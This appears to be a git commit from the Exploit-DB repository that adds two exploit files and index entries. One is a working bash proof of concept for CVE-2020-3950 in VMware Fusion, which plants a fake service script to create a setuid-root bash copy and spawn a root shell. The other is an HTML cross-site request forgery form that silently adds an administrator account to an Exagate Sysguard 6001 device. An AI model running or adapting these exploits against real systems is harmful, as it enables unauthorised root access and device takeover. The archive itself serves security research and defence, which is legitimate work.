DB: 2020-03-21

2 changes to exploits/shellcodes

VMware Fusion 11.5.2 - Privilege Escalation

Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security 2020-03-21 05:01:49 +00:00
parent 26b38131c0
commit d3992973f1
3 changed files with 64 additions and 0 deletions

43
exploits/macos/local/48235.sh Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
# VMware Fusion Professional 11.5.1 (15018442)
# VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services
cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF
chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait
echo "Sleeping for 7 seconds"
sleep 7
$HOME/.woot -p

View file

@ -0,0 +1,19 @@
# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.exagate.com/
# Software Link: https://www.exagate.com/sysguard-6001
# Version: SYSGuard 6001
HTML CSRF PoC :
<html>
<body>
<form action="http://target/kulyon.php" method="POST">
<input type="hidden" name="username" value="joke" />
<input type="hidden" name="password" value="159384" />
<input type="hidden" name="privilege" value="0" />
<input type="hidden" name="button" value="Ekle" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

View file

@ -10994,6 +10994,7 @@ id,file,description,date,author,type,platform,port
48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42484,3 +42485,4 @@ id,file,description,date,author,type,platform,port
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,

Can't render this file because it is too large.